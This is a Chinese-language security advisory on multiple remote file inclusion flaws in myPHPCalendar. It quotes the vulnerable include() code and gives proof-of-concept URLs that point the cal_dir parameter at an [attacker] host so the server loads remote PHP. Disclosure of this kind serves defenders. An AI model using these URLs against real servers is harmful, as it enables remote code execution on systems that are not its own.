myPHPCalendar多个远程文件包含漏洞
发布日期:2003-10-13
更新日期:2003-10-21
受影响系统:myPHPCalendar myPHPCalendar 10192k Build 1 Beta
描述:
BUGTRAQ ID:
8820
myPHPCalendar是一款基于WEB的日历系统。
myPHPCalendar存在多个文件包含漏洞,远程攻击者可以利用这些问题以WEB权限在系统上执行任意指令。
问题存在于如下脚本代码中:
admin.php、contacts.php、convert-date.php :
------------------------
include ("globals.inc");
------------------------
globals.inc :
------------------------------
include($cal_dir."vars.inc");
include($cal_dir."prefs.inc");
------------------------------
index.php :
----------------------------------------
include ($cal_dir."globals.inc");
[...]
include($cal_dir."sql.inc");
----------------------------------------
由于这些脚本对用户提交的参数缺少正确过滤,因此攻击者可以指定远程服务器上的恶意文件作为包含对象,导致以WEB权限在系统上执行任意PHP命令。
<*来源:Frog Man (
leseulfrog@hotmail.com)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=106606157101780&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Frog Man (
leseulfrog@hotmail.com)提供了如下测试方法:
http://[target]/admin.php?cal_dir=http://[attacker]/
http://[target]/contacts.php?cal_dir=http://[attacker]/
http://[target]/convert-date.php?cal_dir=http://[attacker]/
包含的文件如下:
http://[attacker]/vars.inc and/or http://[attacker]/prefs.inc
http://[target]/index.php?cal_dir=http://[attacker]/
包含的文件如下:
http://[target]/globals.inc http://[target]/sql.inc
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 第三方补丁可从如下地址获得:
http://www.phpsecure.info/
厂商补丁:
myPHPCalendar
-------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://myphpcalendar.sourceforge.net/浏览次数:2708
严重程度:0(网友投票)
